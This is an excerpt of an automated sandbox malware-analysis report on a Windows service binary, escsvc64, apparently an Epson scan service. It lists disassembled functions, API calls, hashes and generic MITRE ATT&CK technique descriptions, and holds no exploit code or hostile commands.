Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32(00000000,?,?,0000000140006208,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006046
Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32 ref: 0000000140006089
Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060D8
Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060F0

GetCurrentThreadId.KERNEL32 ref: 0000000140006298

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProcValue$CurrentSleepThread
String ID:
API String ID: 2474595895-0
Opcode ID: 11a1c2b9ce6cae87f56cc3a97f503640f7858b5fc67d15d9ec78c283fe98477f
Instruction ID: b64a60eea287b767be27ce808611aed3f311df57d353ba07e377f7b491abde7b
Opcode Fuzzy Hash: 11a1c2b9ce6cae87f56cc3a97f503640f7858b5fc67d15d9ec78c283fe98477f
Instruction Fuzzy Hash: 2A014C70200B0186FB56EF73B4583E92292EB8CBE0F484224FB661B3F5EE78C8048600

Function 00000001400061B0 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 00000001400061BA
FlsGetValue.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 00000001400061C8
SetLastError.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006223

Part of subcall function 0000000140008A40: Sleep.KERNEL32(?,?,?,00000001400061E3,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140008A90

FlsSetValue.KERNEL32(?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 00000001400061F4

Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32(00000000,?,?,0000000140006208,?,?,?,0000000140004C49,?,?,?,?,0000000140003C3C), ref: 0000000140006046
Part of subcall function 0000000140006020: GetModuleHandleA.KERNEL32 ref: 0000000140006089
Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060D8
Part of subcall function 0000000140006020: GetProcAddress.KERNEL32 ref: 00000001400060F0

GetCurrentThreadId.KERNEL32 ref: 0000000140006208

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProcValue$CurrentSleepThread
String ID:
API String ID: 2474595895-0
Opcode ID: 3df6b742ed069dc10a990c89e0a00f9449d85f0a5b3961fb99b29ae4aa2903f0
Instruction ID: fd70356aea30289e2ff4ef2970fb409e0440e4843ff398306ddbe7ed0b522322
Opcode Fuzzy Hash: 3df6b742ed069dc10a990c89e0a00f9449d85f0a5b3961fb99b29ae4aa2903f0
Instruction Fuzzy Hash: E9016270601B0186FB56EFB3B4583A92692EB8CBE0F484224FF661B3F5EE7CC4458611

Function 01FD5BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 01FD5BC8
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 01FD5CB0

Strings

csm, xrefs: 01FD5BEA
csm, xrefs: 01FD5D02

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b5d7381fdd729d40f201ae6ed7f1741eaecd7a76e3394a9f35f9a9b9338acbd8
Instruction ID: 440717e92fe26ddbebad1a48bca297afc78d73e83a723abc4e24b23fcdbbaae3
Opcode Fuzzy Hash: b5d7381fdd729d40f201ae6ed7f1741eaecd7a76e3394a9f35f9a9b9338acbd8
Instruction Fuzzy Hash: 73615E30618B09CFDB689F2C8498774B7F2FB58315F68465ED499C76A6CB32D881C782

Function 0000000180005C78 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180005CA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000000180005D88

Strings

csm, xrefs: 0000000180005DDA
csm, xrefs: 0000000180005CC2

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: dfee173dcd499577b71966c6b9e68e04b1d122c49cf8e12d755bea0b90d5e3af
Instruction ID: 6f0966b1c37cdfb9bfd8f54508303ee82dc0ab7b6ab2dafb2caee482863340a0
Opcode Fuzzy Hash: dfee173dcd499577b71966c6b9e68e04b1d122c49cf8e12d755bea0b90d5e3af
Instruction Fuzzy Hash: 10715D30614A4D8FEBE9DF18C4887A673D1EB5C352F54865AF489C7292DF70DA88C782

Function 000000014000CDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140005F50: FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70

Part of subcall function 0000000140004A40: RtlCaptureContext.KERNEL32 ref: 0000000140004A51
Part of subcall function 0000000140004A40: IsDebuggerPresent.KERNEL32 ref: 0000000140004A95
Part of subcall function 0000000140004A40: SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140004A9F
Part of subcall function 0000000140004A40: UnhandledExceptionFilter.KERNEL32 ref: 0000000140004AAA
Part of subcall function 0000000140004A40: GetCurrentProcess.KERNEL32 ref: 0000000140004AC0
Part of subcall function 0000000140004A40: TerminateProcess.KERNEL32 ref: 0000000140004ACE

GetModuleHandleA.KERNEL32 ref: 000000014000CE2D
GetProcAddress.KERNEL32 ref: 000000014000CE42

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 000000014000CE38
kernel32.dll, xrefs: 000000014000CE26

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$AddressCaptureContextCurrentDebuggerHandleModulePresentProcTerminateValue
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 1369895830-3733552308
Opcode ID: 6d8b5d62b63a9c4ae9bd89e2a175ac80a50603bd7851d00847f4974ceda82b2b
Instruction ID: 49e8813b4deb30a237d27fc7e6402217b36d86e19928ae94c256e37d805b8284
Opcode Fuzzy Hash: 6d8b5d62b63a9c4ae9bd89e2a175ac80a50603bd7851d00847f4974ceda82b2b
Instruction Fuzzy Hash: F9214D71625B9182EB56DB13F8007DAA3A6B79C7C0F880126BB4E47775EF78C404C704

Function 0000000140001200 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48registryCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerExW.ADVAPI32 ref: 0000000140001220
SetServiceStatus.ADVAPI32 ref: 000000014000128C
SetServiceStatus.ADVAPI32 ref: 00000001400012DF

Part of subcall function 0000000140001460: CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 0000000140001481
Part of subcall function 0000000140001460: CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400014A3
Part of subcall function 0000000140001460: RegisterDeviceNotificationW.USER32 ref: 0000000140001528
Part of subcall function 0000000140001460: SetServiceStatus.ADVAPI32 ref: 000000014000156E
Part of subcall function 0000000140001460: WaitForMultipleObjects.KERNEL32 ref: 00000001400015A8
Part of subcall function 0000000140001460: UnregisterDeviceNotification.USER32 ref: 00000001400015C9
Part of subcall function 0000000140001460: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400015E0
Part of subcall function 0000000140001460: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001400012A0), ref: 00000001400015FC

Strings

EpsonScanSvc, xrefs: 0000000140001216

Memory Dump Source

Source File: 00000000.00000002.1717935204.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1717881086.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717953711.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717972243.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1717987691.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd

Similarity

API ID: Service$Status$CloseCreateDeviceEventHandleNotificationRegister$CtrlHandlerMultipleObjectsUnregisterWait
String ID: EpsonScanSvc
API String ID: 498100820-1444984947
Opcode ID: a5d94d1c1bc15c57b6d9f01a09ccb7c220a53ae407c958d311d4c21d33b5df47
Instruction ID: 597997962a0f345a41b2b22026f52100171705740471e8a7026cae0ea810d904
Opcode Fuzzy Hash: a5d94d1c1bc15c57b6d9f01a09ccb7c220a53ae407c958d311d4c21d33b5df47
Instruction Fuzzy Hash: E52190B06116108BFB578F56F854BD13AB5B74C7D8F44411AFA8D8B271CBBE84498B44

Function 01FD5620 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 292COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 01FD56DB

Strings

RCC, xrefs: 01FD56AC
MOC, xrefs: 01FD56A4

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 41de56702f982b64fe2f38222c95c0c4c6bb52bfbfe6eb78f609202fb18988d9
Instruction ID: 667efd252c6a85e571c9cbd06e63dae187d5ce71f82442c85f37b860c5bcf8cf
Opcode Fuzzy Hash: 41de56702f982b64fe2f38222c95c0c4c6bb52bfbfe6eb78f609202fb18988d9
Instruction Fuzzy Hash: C5A1D470918B488FDB19EF2CC8859B9BBF1FB99304F18465EE489C7161DB35E581CB82

Function 00000001800056F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 292COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 00000001800057B3

Strings

RCC, xrefs: 0000000180005784
MOC, xrefs: 000000018000577C

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 363d6bb0ba7862c09730f605770ad3bf4a01eab7ca613770e0679e36364e9edf
Instruction ID: 782d132307fa3ec13c881fd6add66bb0f9351700a0533e7473bfc9cd57bf72e9
Opcode Fuzzy Hash: 363d6bb0ba7862c09730f605770ad3bf4a01eab7ca613770e0679e36364e9edf
Instruction Fuzzy Hash: 18A1C130518B488FDB55EF28C485BE9BBE0FB99344F14865EF489C7192DF34A685CB82

Function 01FD5DD8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 01FD5E02

Strings

csm, xrefs: 01FD5F96
csm, xrefs: 01FD5E27

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 344832f059a35b2f2b4cab6af87e1e87aee7c388f65b12589a663b30c40c0269
Instruction ID: 52e62bd562df15e805efbd35de4033442c476a10c3bb2b9a12905378509ade7b
Opcode Fuzzy Hash: 344832f059a35b2f2b4cab6af87e1e87aee7c388f65b12589a663b30c40c0269
Instruction Fuzzy Hash: DB71E830618E458BDB29DF1CC494679BBF2FB94311F5842AEE88DCB256D735D882C782

Function 0000000180005EB0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180005EDA

Strings

csm, xrefs: 0000000180005EFF
csm, xrefs: 000000018000606E

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 20aa8ab74dc3e8fd67a9e3c7bb82e1dcf2a23def2c78b1fd2bc7fe295e731d49
Instruction ID: 81675698e28cb140139ea40df420a562aeb6be9398de3bb29cb6a4704c2524ca
Opcode Fuzzy Hash: 20aa8ab74dc3e8fd67a9e3c7bb82e1dcf2a23def2c78b1fd2bc7fe295e731d49
Instruction Fuzzy Hash: FF811930508A498BDBAADF18C0843F5B7D1FB9D345F14C16DF489CB2A6DE349A85C782

Function 01FD3C10 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 01FD3C3B
_IsNonwritableInCurrentImage.LIBCMT ref: 01FD3CD2

Strings

csm, xrefs: 01FD3CB9

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: cf8e509d570c1848d0f9797bc63c7dafb47f65f362302048ea0467d3f3ad287b
Instruction ID: 47b057b3503b947fc77563cb07b5adc0e3bf3686d3b77714f25ac296f8d6818f
Opcode Fuzzy Hash: cf8e509d570c1848d0f9797bc63c7dafb47f65f362302048ea0467d3f3ad287b
Instruction Fuzzy Hash: E76108B0708E088BDF28EF5CD89567477D2FB54310F18422DEA86C3256EA32E851CF82

Function 01FD53B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 01FD545B

Strings

MOC, xrefs: 01FD5423
RCC, xrefs: 01FD542B

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 61cf8898ebdfdc3fdd320f5ed4e2e062973869c9246d2cdf7cee2fcfd1f74536
Instruction ID: bdd01284f90dce56bac9fd18554a52b9d8935c391fc4dae8b6fd34bd94379433
Opcode Fuzzy Hash: 61cf8898ebdfdc3fdd320f5ed4e2e062973869c9246d2cdf7cee2fcfd1f74536
Instruction Fuzzy Hash: DE71D030918B488FDB29DF1CC442BAAB7E1FB99314F580A5ED589C3121DB75A481CB83

Function 0000000180005488 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 0000000180005533

Strings

RCC, xrefs: 0000000180005503
MOC, xrefs: 00000001800054FB

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: cbdf1a0405eeeb9ee19cbaa3932b057c3defabee4b796518833c7a9b81170068
Instruction ID: 2573f572de498be4df4f1860bd609dea17f29197c62f27e4b8dccf343337cd0c
Opcode Fuzzy Hash: cbdf1a0405eeeb9ee19cbaa3932b057c3defabee4b796518833c7a9b81170068
Instruction Fuzzy Hash: 8D719230518B4C8FE7A5DF18C446BE6B7E0FB9C345F508A5EE4C9C3252DB74A5858B82

Function 0000000180003CE8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180003D13
_IsNonwritableInCurrentImage.LIBCMT ref: 0000000180003DAA

Strings

csm, xrefs: 0000000180003D91

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: df8b22781e2b7e9397aa037661e54ee7935159f332a0a33616de54d4796eae03
Instruction ID: 2d8cbc02748ef7321837904150ba0fde8245bbbc29b9dd48ee64278b709af079
Opcode Fuzzy Hash: df8b22781e2b7e9397aa037661e54ee7935159f332a0a33616de54d4796eae03
Instruction Fuzzy Hash: D871D930618A4C4BEBAAEE1DD4867B477D5EB58390F10826DF84AC32C6EE34ED558781

Function 01FD6470 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 01FD651A
_CreateFrameInfo.LIBVCRUNTIME ref: 01FD6543

Strings

csm, xrefs: 01FD6643

Memory Dump Source

Source File: 00000000.00000002.1717618022.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1fd0000_escsvc64.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 20d9dd5868b5ec9e0a42498d2107ce69bc8ea7373916fa7eb109017716fd0d1a
Instruction ID: fa131b5100729293696052cbdbbe18e9edf149ea49605a1961ee1a15ed1914e3
Opcode Fuzzy Hash: 20d9dd5868b5ec9e0a42498d2107ce69bc8ea7373916fa7eb109017716fd0d1a
Instruction Fuzzy Hash: C1514DB0518B099FD764EF2CC485679B7E2FB99321F54069EE589C7221DB31E8428B83

Function 0000000180006548 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000001800065F2
_CreateFrameInfo.LIBVCRUNTIME ref: 000000018000661B

Strings

csm, xrefs: 000000018000671B

Memory Dump Source

Source File: 00000000.00000002.1718056200.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: ce40aefc9edf07df887317f444d5c0bd08fe4ad5eae95838032d3f9405fedf99
Instruction ID: f7c9971cb605d5fff1342d11b9a52e1eaddacd09fb7810c935e50d82192d7268
Opcode Fuzzy Hash: ce40aefc9edf07df887317f444d5c0bd08fe4ad5eae95838032d3f9405fedf99
Instruction Fuzzy Hash: 695190B1518B489FE7A1EF2880467A977E0FB5D391F10455EF189C7262CF30EA45CB82

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

